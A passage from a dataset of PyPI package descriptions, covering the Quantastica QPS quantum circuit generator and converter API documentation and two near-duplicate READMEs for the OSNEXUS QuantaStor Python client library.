0, 0.7071067811865475 ]\n\t\t}\n\t],\n\t\"settings\": {\n\t\t\"max_diff\": 0.001,\n\t\t\"diff_method\": \"distance\",\n\t\t\"single_solution\": False,\n\t\t\"pre_processing\": \"\",\n\t\t\"allowed_gates\": \"u3,cx\",\n\t\t\"coupling_map\": [],\n\t\t\"min_gates\": 0,\n\t\t\"max_gates\": 0\n\t},\n\t\"status\": \"done\",\n\t\"output\": {\n\t\t\"circuits\": [\n\t\t\t{\n\t\t\t\t\"qubits\": 2,\n\t\t\t\t\"cregs\": [],\n\t\t\t\t\"diff\": 0,\n\t\t\t\t\"program\": [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"name\": \"u3\",\n\t\t\t\t\t\t\"wires\": [ 0 ],\n\t\t\t\t\t\t\"options\": {\n\t\t\t\t\t\t\t\"params\": {\n\t\t\t\t\t\t\t\t\"theta\": -1.570796370506287,\n\t\t\t\t\t\t\t\t\"phi\": -3.141592741012573,\n\t\t\t\t\t\t\t\t\"lambda\": -5.327113628387451\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"name\": \"cx\",\n\t\t\t\t\t\t\"wires\": [ 0, 1 ],\n\t\t\t\t\t\t\"options\": {}\n\t\t\t\t\t}\n\t\t\t\t],\n\t\t\t\t\"index\": 0,\n\t\t\t\t\"qasm\": \"OPENQASM 2.0;\\ninclude \\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[0];\\ncx q[0], q[1];\\n\",\n\t\t\t\t\"qasmExt\": \"OPENQASM 2.0;\\ninclude \\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[0];\\ncx q[0], q[1];\\n\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t\"qubits\": 2,\n\t\t\t\t\"cregs\": [],\n\t\t\t\t\"diff\": 0,\n\t\t\t\t\"program\": [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"name\": \"u3\",\n\t\t\t\t\t\t\"wires\": [ 1 ],\n\t\t\t\t\t\t\"options\": {\n\t\t\t\t\t\t\t\"params\": {\n\t\t\t\t\t\t\t\t\"theta\": -1.570796370506287,\n\t\t\t\t\t\t\t\t\"phi\": -3.141592741012573,\n\t\t\t\t\t\t\t\t\"lambda\": -5.327113628387451\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"name\": \"cx\",\n\t\t\t\t\t\t\"wires\": [ 1, 0 ],\n\t\t\t\t\t\t\"options\": {}\n\t\t\t\t\t}\n\t\t\t\t],\n\t\t\t\t\"index\": 1,\n\t\t\t\t\"qasm\": \"OPENQASM 2.0;\\ninclude \\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[1];\\ncx q[1], q[0];\\n\",\n\t\t\t\t\"qasmExt\": \"OPENQASM 2.0;\\ninclude \\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[1];\\ncx q[1], q[0];\\n\"\t\t\t\t\n\t\t\t}\n\t\t],\n\t\t\"error_code\": 0,\n\t\t\"message\": \"\",\n\t\t\"time_taken\": 0.002,\n\t\t\"version\": \"0.1.0\"\n\t},\n\t\"queuedAt\": \"2021-02-06T23:39:29.676Z\",\n\t\"startedAt\": \"2021-02-06T23:39:29.926Z\",\n\t\"finishedAt\": \"2021-02-06T23:39:30.383Z\"\n}QPS.generator.stop_job(job_id)Stop running or cancel queued job. Job will be put intodraftstate, and you can start it again later by callingstart_job().Example:fromquantastica.qps_apiimportQPSresponse=QPS.generator.stop_job(\"SNhiCqSCT2WwRWKCd\")print(response)Example output:{ _id: \"SNhiCqSCT2WwRWKCd\", message: \"OK\" }QPS.generator.stop_all_jobs(status_filter=None)Stop running job / cancel all queued jobs.status_filter- you can stop only a running job by providingstatus_filter=\"running\"(after this, next job from the queue will be executed). Or, you can cancel all queued jobs by providingstatus_filter=\"queued\"(running job will not be affected - it will continue running).Example 1- stop running job and remove all jobs from queue:fromquantastica.qps_apiimportQPSstopped=QPS.generator.stop_all_jobs()print(stopped)Example output:{\n\t\"stopped\": [ \n\t\t{ \"_id\": \"SNhiCqSCT2WwRWKCd\", \"name\": \"Decompose\", \"type\": \"unitary\" },\n\t\t{ \"_id\": \"R8tJH7XoZ233oTREy\", \"name\": \"4Q Gauss\", \"type\": \"vectors\" }\n\t]\n}Example 2- stop only a running job. Next job from queue, if any, will start:fromquantastica.qps_apiimportQPSstopped=QPS.generator.stop_all_jobs(status_filter=\"running\")print(stopped)Example output:{\n\t\"stopped\": [\n\t\t{ \"_id\": \"SNhiCqSCT2WwRWKCd\", \"name\": \"Decompose\", \"type\": \"unitary\" }\n\t]\n}Example 3- cancel all queued jobs. Running job will not be affected:fromquantastica.qps_apiimportQPSstopped=QPS.generator.stop_all_jobs(status_filter=\"queued\")print(stopped)Example output:{\n\t\"stopped\": [\n\t\t{ \"_id\": \"R8tJH7XoZ233oTREy\", \"name\": \"4Q Gauss\", \"type\": \"vectors\" }\n\t]\n}QPS.generator.start_job(job_id)Start previously stopped/canceled job (can be any job with statusdraft).Example:fromquantastica.qps_apiimportQPSresponse=QPS.generator.start_job(\"SNhiCqSCT2WwRWKCd\")print(response)Example output:{ _id: \"SNhiCqSCT2WwRWKCd\", message: \"OK\" }Circuit from vectorsFind quantum circuit from pairs of initial & final state vectors (wave functions).QPS.generator.circuit_from_vectors(vector_pairs, endianness = \"little\", job_name=None, settings = {}, start_job=True)vector_pairsis list containing vector pairs. Each vector pair is list with 2 elements: initial vector and final vector. All vectors in all pairs must be of same length (same number of qubits).endiannessstring. Orientation of bits in state vector (most significant bit/first qubit or least significant bit/first qubit). Can belittle(like Qiskit) orbig. Default islittle.job_namestring is optional. You can give it a human readable name.settingsobject is optional. Default is:{\"allowed_gates\":\"u3,cx\",\"max_diff\":1e-3,\"diff_method\":\"distance\",\"single_solution\":True,\"pre_processing\":\"\"}Note: ifsettingsargument is provided, it will overwrite default values, but only provided keys will be overwritten - not entire default settings object.start_jobif this argument isTrue(default) the job will be immediatelly sent to execution queue. Ifstart_jobisFalsethen it will stay indraftstate and you will be able to start it later by callingstart_job()method.Example:fromquantastica.qps_apiimportQPSvector_pairs=[[[1,0,0,0],[0.5+0j,0.5+0j,0.5+0j,0.5+0j]],[[0,1,0,0],[0.5+0j,0+0.5j,-0.5+0j,0-0.5j]],[[0,0,1,0],[0.5+0j,-0.5+0j,0.5+0j,-0.5+0j]],[[0,0,0,1],[0.5+0j,0-0.5j,-0.5+0j,0+0.5j]]]job_id=QPS.generator.circuit_from_vectors(vector_pairs,settings={\"instruction_set\":[\"h\",\"cu1\",\"swap\"],\"single_solution\":False})job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):print(job_output[\"message\"])else:forcircuitinjob_output[\"circuits\"]:print(circuit[\"qasm\"])Example output:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nh q[1];\nswap q[0], q[1];\ncu1 (2.356194496154785) q[0], q[1];\nh q[1];\n\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nh q[1];\ncu1 (2.356194496154785) q[0], q[1];\nh q[0];\nswap q[0], q[1];\n\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nh q[1];\ncu1 (2.356194496154785) q[0], q[1];\nswap q[0], q[1];\nh q[1];\n\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nswap q[0], q[1];\nh q[0];\ncu1 (2.356194496154785) q[0], q[1];\nh q[1];State preparationGet circuit which will transform ground state (all qubits reset) to desired final state vector.QPS.generator.state_preparation(final_vector, endianness = \"little\", job_name=None, settings = {}, start_job=True)final_vectoris target vector.endiannessstring. Orientation of bits in state vector (most significant bit/first qubit or least significant bit/first qubit). Can belittle(like Qiskit) orbig. Default islittle.job_namestring is optional. You can give it a human readable name.settingsobject is optional. Default: seeQPS.generator.circuit_from_vectors().start_jobif this argument isTrue(default) the job will be immediatelly sent to execution queue. Ifstart_jobisFalsethen it will stay indraftstate and you will be able to start it later by callingstart_job()method.Example:fromquantastica.qps_apiimportQPSdesired_state=[0.5,0.5,0.5,0.5]job_id=QPS.generator.state_preparation(desired_state,settings={\"instruction_set\":[\"u3\",\"cx\"]})job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):print(job_output[\"message\"])else:forcircuitinjob_output[\"circuits\"]:print(circuit[\"qasm\"])Example output:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nu3 (1.570796370506287, 0, 1.217840194702148) q[0];\nu3 (1.570796370506287, 0, 0.621559917926788) q[1];TranspileTranspile circuit (change instruction set).QPS.generator.transpile(input_qasm, method=\"replace_blocks\", method_options={}, job_name=None, settings = {}, start_job=True)input_qasmis string containing OpenQASM 2.0 code.methodis method name string. Can be one of: \"replace_circuit\", \"replace_blocks\", \"replace_gates\". Default: \"replace_blocks\".method_optionsdict with following structure:If method isreplace_blocksthen:{ \"block_size\": 2, \"two_pass\": False }(maximum block size is 4).For other methods: no options (method_optionsis ignored)job_namestring is optional. You can give it a human readable name.settingsobject is optional. Default is:{\"allowed_gates\":\"u3,cx\",\"max_diff\":1e-3,\"diff_method\":\"distance\",\"single_solution\":True,\"pre_processing\":\"experimental1\"}Defaultdiff_methodisdistance, which means that input and output circuit's global phase will match. That also means longer running time and possibly deeper output circuit (especially with new IBM's instruction setid, x, sx, rz, cx). If you are relaxed about global phase (like Qiskit's transpile method), then provide\"diff_method\": \"ignorephase\"insettings.Note: ifsettingsargument is provided, it will overwrite default values, but only provided keys will be overwritten - not entire default settings object.start_jobif this argument isTrue(default) the job will be immediatelly sent to execution queue. Ifstart_jobisFalsethen it will stay indraftstate and you will be able to start it later by callingstart_job()method.Example:fromquantastica.qps_apiimportQPSinput_qasm=\"\"\"OPENQASM 2.0;include \"qelib1.inc\";qreg q[2];h q[0];cx q[0], q[1];\"\"\"job_id=QPS.generator.transpile(input_qasm,settings={\"instruction_set\":[\"id\",\"x\",\"sx\",\"rz\",\"cx\"],\"diff_method\":\"ignorephase\"})job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):print(job_output[\"message\"])else:forcircuitinjob_output[\"circuits\"]:print(circuit[\"qasm\"])Example output:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nsx q[0];\nrz (1.570796370506287) q[0];\nsx q[0];\ncx q[0], q[1];Decompose matrixDecompose unitary matrix (find circuit from matrix).QPS.generator.decompose_unitary(unitary, endianness = \"big\", job_name=None, settings = {}, start_job=True)unitarymatrix operator.endianness- orientation of the matrix. Can belittleendian (like Qiskit) orbigendian. Default isbig. Note that default endianness of the matrix differs from default endianness of vectors in other methods. That's to be aligned with QPS. In Qiskit, both matrices and vectors arelittleendian. So, if you are solving unitary from Qiskit then provideendianness = \"little\"argument.job_namestring is optional. You can give it a human readable name.settingsobject is optional. Default is:{\"allowed_gates\":\"u3,cx\",\"max_diff\":1e-3,\"diff_method\":\"distance\",\"single_solution\":True,\"pre_processing\":\"\"}Note: ifsettingsargument is provided, it will overwrite default values, but only provided keys will be overwritten - not entire default settings object.start_jobif this argument isTrue(default) the job will be immediatelly sent to execution queue. Ifstart_jobisFalsethen it will stay indraftstate and you will be able to start it later by callingstart_job()method.Example:fromquantastica.qps_apiimportQPSunitary=[[0.5+0.0j,0.5+0.0j,0.5+0.0j,0.5+0.0j],[0.5+0.0j,0.5+0.0j,-0.5+0.0j,-0.5+0.0j],[0.5+0.0j,-0.5+0.0j,0.0+0.5j,0.0-0.5j],[0.5+0.0j,-0.5+0.0j,0.0-0.5j,0.0+0.5j]]job_id=QPS.generator.decompose_unitary(unitary,settings={\"instruction_set\":[\"h\",\"cu1\",\"swap\"],\"single_solution\":False})job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):print(job_output[\"message\"])else:forcircuitinjob_output[\"circuits\"]:print(circuit[\"qasm\"])Example output:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nh q[1];\nswap q[0], q[1];\ncu1 (1.570796370506287) q[0], q[1];\nh q[1];\n\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nh q[1];\ncu1 (1.570796370506287) q[0], q[1];\nh q[0];\nswap q[0], q[1];\n\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nh q[1];\ncu1 (1.570796370506287) q[0], q[1];\nswap q[0], q[1];\nh q[1];\n\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nswap q[0], q[1];\nh q[0];\ncu1 (1.570796370506287) q[0], q[1];\nh q[1];Create algorithm from truth tableCreate circuit which implements logical expression whose truth table is given.QPS.generator.circuit_from_truth_table(truth_table_csv, column_defs, csv_delimiter=None, additional_qubits=1, job_name=None, settings={}, start_job=True)truth_table_csvis string containing truth table in CSV formatcolumn_defslist of strings describing each column from truth table:\"input\",\"output\"or\"ignore\"csv_delimiterCSV column delimiter char:None,\",\"(comma) or\"\\t\"(tab). If delimiter isNone(default) it will be automatically detected.additional_qubitsnumber of qubits to add (to displace input and output qubits).job_namestring is optional. You can give it a human readable name.settingsobject is optional. Default is:{\"allowed_gates\":\"x,cx,ccx,swap\",\"max_diff\":1e-3,\"diff_method\":\"distance\",\"single_solution\":True,\"pre_processing\":\"\"}Example:fromquantastica.qps_apiimportQPStruth_table=\"\"\"A,B,A_NAND_B0,0,10,1,11,0,11,1,0\"\"\"job_id=QPS.generator.circuit_from_truth_table(truth_table,[\"input\",\"input\",\"output\"])job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):raiseException(job_output[\"message\"])else:if(len(job_output[\"circuits\"])==0):raiseException(\"No results.\")else:forcircuitinjob_output[\"circuits\"]:print(circuit[\"qasm\"])Example output:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[3];\nx q[2];\nccx q[0], q[1], q[2];Run problem fileSolve problem provided in internal format used by generator.QPS.generator.solve(problem, settings = {}, start_job=True)problemobject - generator job exported to json from QPS.settingsargument is optional. If provided, it will overwrite keys inproblem.settings. Note that only provided keys will be overwritten - not entireproblem.settingsobject.start_jobif this argument isTrue(default) the job will be immediatelly sent to execution queue. Ifstart_jobisFalsethen it will stay indraftstate and you will be able to start it later by callingstart_job()method.Example:fromquantastica.qps_apiimportQPSproblem={\"name\":\"Bell\",\"type\":\"vectors\",\"source\":{\"vectors\":{\"text1\":\"[ 1, 0, 0, 0 ]\",\"text2\":\"[ 1/sqrt(2), 0, 0, 1/sqrt(2) ]\",\"endianness1\":\"little\",\"endianness2\":\"little\"}},\"problem\":[{\"input\":[1,0,0,0],\"output\":[0.7071067811865475,0,0,0.7071067811865475]}],\"settings\":{\"allowed_gates\":\"u3,cx\",\"coupling_map\":[],\"min_gates\":0,\"max_gates\":0,\"max_diff\":0.001,\"diff_method\":\"distance\",\"single_solution\":False,\"pre_processing\":\"\"}}job_id=QPS.generator.solve(problem)job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):print(job_output[\"message\"])else:forcircuitinjob_output[\"circuits\"]:print(circuit[\"qasm\"])Example output:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nu3 (-1.570796370506287, -3.141592741012573, -2.675650835037231) q[0];\ncx q[0], q[1];\n\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nu3 (-1.570796370506287, -3.141592741012573, -2.675650835037231) q[1];\ncx q[1], q[0];Generator output formatGenerator job object has following structure:{\"name\":String,\"type\":String,\"source\":Object,\"problem\":Array,\"settings\":Object,\"status\":String,\"output\":Object,\"queuedAt\":String,\"startedAt\":String,\"finishedAt\":String}Keys important to user are:nameString: name of the jobstatusString: can bedraft,queued,running,error,done.outputObject with following structure:{\"error_code\":Integer,\"message\":String,\"time_taken\":Float,\"version\":String,\"circuits\":ArrayofObject}error_codeInteger: 0 on success, non-zero on errormessageString: error message if error code is non-zerotime_takenFloat: number of secondsversionString: generator versioncircuitsArray: resulting circuits. Each is object with following structure:{\"qubits\":Integer,\"cregs\":Array,\"program\":Array,\"diff\":Float,\"index\":Integer,\"qasm\":String,\"qasmExt\":String}Keys important to user are:qasmOpenQASM 2.0 source code of the resulting circuit.qasmExtOpenQASM 2.0 with extended instruction set (all gates supported by Quantum Programming Studio).Difference betweenqasmandqasmExt: if circuit contains gate supported by QPS but not directly supported by OpenQASM 2.0 thenqasmwill contain equivalent circuit transpiled to OpenQASM 2.0 instruction set, butqasmExtwill contain gates as is.For example if circuit contains IONQ native gategpi2(2.51678906856393)on first qubit:qasmwill be:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[1];\nu3 (1.5707963267948966, 0.9459927417690333, -0.9459927417690333) q[0];qasmExtwill contain:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[1];\ngpi2 (2.51678906856393) q[0];Example job object with output:{\"_id\":\"r9LskFoLPQW5w7HTp\",\"name\":\"Bell\",\"type\":\"vectors\",\"source\":{\"vectors\":{\"text1\":\"[ 1, 0, 0, 0 ]\",\"text2\":\"[ 1/sqrt(2), 0, 0, 1/sqrt(2) ]\",\"endianness1\":\"little\",\"endianness2\":\"little\"}},\"problem\":[{\"input\":[1,0,0,0],\"output\":[0.7071067811865475,0,0,0.7071067811865475]}],\"settings\":{\"max_diff\":0.001,\"diff_method\":\"distance\",\"single_solution\":False,\"pre_processing\":\"\",\"allowed_gates\":\"u3,cx\",\"coupling_map\":[],\"min_gates\":0,\"max_gates\":0},\"status\":\"done\",\"output\":{\"circuits\":[{\"qubits\":2,\"cregs\":[],\"diff\":0,\"program\":[{\"name\":\"u3\",\"wires\":[0],\"options\":{\"params\":{\"theta\":-1.570796370506287,\"phi\":-3.141592741012573,\"lambda\":-5.327113628387451}}},{\"name\":\"cx\",\"wires\":[0,1],\"options\":{}}],\"index\":0,\"qasm\":\"OPENQASM 2.0;\\ninclude\\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[0];\\ncx q[0], q[1];\\n\",\"qasmExt\":\"OPENQASM 2.0;\\ninclude\\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[0];\\ncx q[0], q[1];\\n\"},{\"qubits\":2,\"cregs\":[],\"diff\":0,\"program\":[{\"name\":\"u3\",\"wires\":[1],\"options\":{\"params\":{\"theta\":-1.570796370506287,\"phi\":-3.141592741012573,\"lambda\":-5.327113628387451}}},{\"name\":\"cx\",\"wires\":[1,0],\"options\":{}}],\"index\":1,\"qasm\":\"OPENQASM 2.0;\\ninclude\\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[1];\\ncx q[1], q[0];\\n\",\"qasmExt\":\"OPENQASM 2.0;\\ninclude\\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[1];\\ncx q[1], q[0];\\n\"}],\"error_code\":0,\"message\":\"\",\"time_taken\":0.002,\"version\":\"0.1.0\"},\"createdAt\":\"2021-02-06T23:39:29.108Z\",\"modifiedAt\":\"2021-02-06T23:39:30.383Z\",\"queuedAt\":\"2021-02-06T23:39:29.676Z\",\"startedAt\":\"2021-02-06T23:39:29.926Z\",\"finishedAt\":\"2021-02-06T23:39:30.383Z\"}Using Generator with QiskitGenerator is using OpenQASM 2.0 format for input and output, so integration with Qiskit (and other frameworks that support QASM) is easy.Exampletranspile Qiskit circuit:fromqiskitimportQuantumCircuitfromqiskit.circuit.randomimportrandom_circuitfromqiskit.quantum_infoimportOperatorfromquantastica.qps_apiimportQPS# Generate random Qiskit circuitqc=random_circuit(5,5,measure=False)# Get QASM codeinput_qasm=qc.qasm()# Transpile with generatorjob_id=QPS.generator.transpile(input_qasm,settings={\"instruction_set\":[\"id\",\"u3\",\"cx\"],\"diff_method\":\"ignorephase\"})job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):raiseException(job_output[\"message\"])transpiled_circuit=job_output[\"circuits\"][0]# Get QASM codetranspiled_qasm=transpiled_circuit[\"qasm\"]# Create Qiskit circuittranspiled_qc=QuantumCircuit.from_qasm_str(transpiled_qasm)# Show circuitprint(\"Depth:\",transpiled_qc.depth())print(\"Ops:\",sum(jfori,jintranspiled_qc.count_ops().items()))display(transpiled_qc.draw(output=\"mpl\"))Quantum Language Converter APIQuantum Language Converteris a tool which converts quantum program between different quantum programming languages and frameworks. It is also available as aq-convertcommand line tool and as a web UI athttps://quantum-circuit.com/qconvert.QPS has integrated quantum language converter API which you can access directly from python code:QPS.converter.convert(input, source, dest)Convertsinputquantum program given as string fromsourceformat intodestformat.inputString. Program source codesourceString. Input format:qasmOpenQASM 2.0source codequilQuilsource codeqobjQObjionqIONQ(json)quantum-circuitquantum-circuitobject (json)toasterQubit Toasterobject (json)destString. Output format:qiskitQiskitqasmOpenQASM 2.0qasm-extOpenQASM 2.0 with complete instruction set supported by QPS (and other Quantastica tools)qobjQObjquilQuilpyquilpyQuilbraketBraketcirqCirqtfqTensorFlow QuantumqsharpQSharpquestQuESTjsquantum-circuit(javascript)quantum-circuitquantum-circuit(json)toasterQubit ToastersvgSVG (standalone)svg-inlineSVG (inline)Example 1- convert QASM 2.0 program to QUIL:fromquantastica.qps_apiimportQPSinput_program=\"\"\"OPENQASM 2.0;include \"qelib1.inc\";qreg q[2];creg c[2];h q[0];cx q[0], q[1];measure q[0] -> c[0];measure q[1] -> c[1];\"\"\"output_program=QPS.converter.convert(input_program,\"qasm\",\"quil\")print(output_program)Output:DECLARE ro BIT[2]\nH 0\nCNOT 0 1\nMEASURE 0 ro[0]\nMEASURE 1 ro[1]Example 2- convert QASM 2.0 program to circuit drawing as vector image:fromquantastica.qps_apiimportQPSinput_program=\"\"\"OPENQASM 2.0;include \"qelib1.inc\";qreg q[2];creg c[2];h q[0];cx q[0], q[1];measure q[0] -> c[0];measure q[1] -> c[1];\"\"\"output_svg=QPS.converter.convert(input_program,\"qasm\",\"svg\")open(\"output.svg\",\"w\").write(output_svg)Utils APIQPS.utils.random_circuit(num_qubits=5, output_format=\"quantum-circuit\", options=None)Returns random quantum circuit.num_qubitsInteger. Number of qubits. Default:5.formatString. Output format. The same asQPS.converter.convert()function'sdestargument. Example:\"qasm\". Default:\"quantum-circuit\".optionsDict. Optional. Can contain following keys:instruction_setList of gates to use. Example:[\"u3\", \"cx\"]. Default:[ \"u3\", \"rx\", \"ry\", \"rz\", \"cx\", \"cz\" ].num_gatesInteger. Number of gates in the circuit. Default isnum_qubits * 8.mid_circuit_measurementBool. Default:False.mid_circuit_resetBool. Default:False.classic_controlBool. Default:False."} +{"package": "quantastor-pkg", "pacakge-description": "QuantaStorOSNEXUS QuantaStor Python Client LibraryThe python library for QuantaStor simplifies the process of automating QuantaStor management operations via python scripts. All of the published QuantaStor REST APIs as documented on the OSNEXUS documentationwikiare callable via the python client.System Requirements for QuantaStorThe QuantaStor Python Client Library requires a QuantaStor box to interact with. The minimum requirements for your storage system vary based on the workload. Use ourSolution Design Toolsto help you find the solution that best fits your use-case and budget. The minimum requirements provided in this documentation serves as the bare minimum to explore using the software and its capabilities.Intel Xeon or AMD x64 bit server (or virtual server)16GB RAM2x SSDs for system/boot drivesBoot drives should be hardware mirrored and should be atleast 64GB in size.One or more disks per system for storage pools. (SSD/NVMe/PCI SSD/SATA/SAS/FC/iSCSI/AoE)DownloadQuantaStor USB/ISO Installation Mediafor installation.InstallationInstall QuantastorTo use the QuantaStor Python Client Library, you must first install QuantaStor on your server hardware or use a QuantaStor virtual system. Installation of QuantaStor will also include python3. QuantaStor ISO files are created as hybrid ISO files which can be written to DVD media with DVD writting software or directly copied to a USB flash drive usingdd. Follow theinstallation guideon our support wiki to get started. The installation guide provides instructions for installation and configuration on both server hardware and virtual machines.RunpipInstallerUsing the PYPI pip installer run the following command to install the quantastor python client library:On Linux/Unix$ sudo python3 -m pip install quantastor-pkgTesting qs_client InstallationStart the python3 interpreter:$ python3Importquantastor_sdk_enabled()function from the library:>>> from quantastor.qs_client import quantastor_sdk_enabledThe following should print out 'True':>>> print (quantastor_sdk_enabled())ExamplesSee the./examples/directory for examples:Basic ExampleThe basic example for the QuantaStor Python Client Library (example.py) does one operation to get information about the storage system that is specified from the command line and dumps the response data in JSON format. You can use this Python script as a basic template to build off of for QuantaStor automation.StorageVolumeThe fileexample_sv.shis a bash script that utilizes two python scripts,vol_setup.pyandacl_attach.py, to create an example storage volume and host. It then utilizes theqs-utilQuantaStor tool-set to add a host initiator and login to an ISCSI session with the example storage volume.NetworkShareThe fileexample_ns.shis a bash script that utilizes theshr_setup.pypython script to create an example network share. Then using the zfsmountcommand, mounts the network share to the local mount directory/mnt/testMount.Python Interpreter UsageTo quickly do operations from the commandline you can easily utilize the QuantaStor Python Client Library strait from the Python3 interpreter. Run the following commands in the python interpreter to set up a client connection to your QuantaStor server. Replace 'hostIP', 'username', and 'password' with your own credentials:>>> from qs_client import QuantastorClient\n>>> client = QuantastorClient('hostIP', 'username', 'password')Requests are sent using HTTPS see the 'SSL Certs' section to learn to generate your own 'qs-ca-cert' to use for host verification. If you do not provide your own ca-cert, your client will warn you that 'requests cannot be verified'.Once you have generated an instance of the 'QuantastorClient' class you can start making REST service calls to your QuantaStor server. The following is a simple example usage similar to the 'example.py' script:>>> system = client.storage_system_get()This command will return your QuantaStor storage system as a 'StorageSystem' object. You can view the meta of any object class in JSON format (pretty print) by using the StorageSystem.exportJson() function and the dumps() function from the python json module.>>> import json\n>>> print (json.dumps(system.exportJson(), sort_keys=True, indent=4, separators=(',', ': ')))For more information about our REST API methods and objects see ourReference Guide.SSL CertsThe 'QuantastorClient' class supports HTTPS ca-cert verification. You can provide the full path to your certification file as the fourth argument when creating an instance of the 'QuantastorClient' class:client = QuantastorClient('hostIP', 'username', 'password','/full/path/to/cert')The certification path is an optional argument, but you will be warned that your requests cannot be verified if you do not provide one or if your certification path does not exist. If you do provide a valid ca-cert file, REST service calls will only succeed if your SSL verification succeeds."} +{"package": "quantastor-pyclient", "pacakge-description": "QuantaStorOSNEXUS QuantaStor Python Client LibraryThe python library for QuantaStor simplifies the process of automating QuantaStor management operations via python scripts. All of the published QuantaStor REST APIs as documented on the OSNEXUS documentationwikiare callable via the python client.System Requirements for QuantaStorThe QuantaStor Python Client Library requires a QuantaStor box to interact with. The minimum requirements for your storage system vary based on the workload. Use ourSolution Design Toolsto help you find the solution that best fits your use-case and budget. The minimum requirements provided in this documentation serves as the bare minimum to explore using the software and its capabilities.Intel Xeon or AMD x64 bit server (or virtual server)16GB RAM2x SSDs for system/boot drivesBoot drives should be hardware mirrored and should be atleast 64GB in size.One or more disks per system for storage pools. (SSD/NVMe/PCI SSD/SATA/SAS/FC/iSCSI/AoE)DownloadQuantaStor USB/ISO Installation Mediafor installation.InstallationInstall QuantastorTo use the QuantaStor Python Client Library, you must first install QuantaStor on your server hardware or use a QuantaStor virtual system. Installation of QuantaStor will also include python3. QuantaStor ISO files are created as hybrid ISO files which can be written to DVD media with DVD writting software or directly copied to a USB flash drive usingdd. Follow theinstallation guideon our support wiki to get started. The installation guide provides instructions for installation and configuration on both server hardware and virtual machines.RunpipInstallerUsing the PYPI pip installer run the following command to install the quantastor python client library:On Linux/Unix$ sudo python3 -m pip install quantastor-pkgTesting qs_client InstallationStart the python3 interpreter:$ python3Importquantastor_sdk_enabled()function from the library:>>> from quantastor.qs_client import quantastor_sdk_enabledThe following should print out 'True':>>> print (quantastor_sdk_enabled())ExamplesSee the./examples/directory for examples:Basic ExampleThe basic example for the QuantaStor Python Client Library (example.py) does one operation to get information about the storage system that is specified from the command line and dumps the response data in JSON format. You can use this Python script as a basic template to build off of for QuantaStor automation.StorageVolumeThe fileexample_sv.shis a bash script that utilizes two python scripts,vol_setup.pyandacl_attach.py, to create an example storage volume and host. It then utilizes theqs-utilQuantaStor tool-set to add a host initiator and login to an ISCSI session with the example storage volume.NetworkShareThe fileexample_ns.shis a bash script that utilizes theshr_setup.pypython script to create an example network share. Then using the zfsmountcommand, mounts the network share to the local mount directory/mnt/testMount.Python Interpreter UsageTo quickly do operations from the commandline you can easily utilize the QuantaStor Python Client Library strait from the Python3 interpreter. Run the following commands in the python interpreter to set up a client connection to your QuantaStor server. Replace 'hostIP', 'username', and 'password' with your own credentials:>>> from qs_client import QuantastorClient\n>>> client = QuantastorClient('hostIP', 'username', 'password')Requests are sent using HTTPS see the 'SSL Certs' section to learn to generate your own 'qs-ca-cert' to use for host verification. If you do not provide your own ca-cert, your client will warn you that 'requests cannot be verified'.Once you have generated an instance of the 'QuantastorClient' class you can start making REST service calls to your QuantaStor server. The following is a simple example usage similar to the 'example.py' script:>>> system = client.storage_system_get()This command will return your QuantaStor storage system as a 'StorageSystem' object. You can view the meta of any object class in JSON format (pretty print) by using the StorageSystem.exportJson() function and the dumps() function from the python json module.>>> import json\n>>> print (json.dumps(system.exportJson(), sort_keys=True, indent=4, separators=(',', ': ')))For more information about our REST API methods and objects see ourReference Guide.SSL CertsThe 'QuantastorClient' 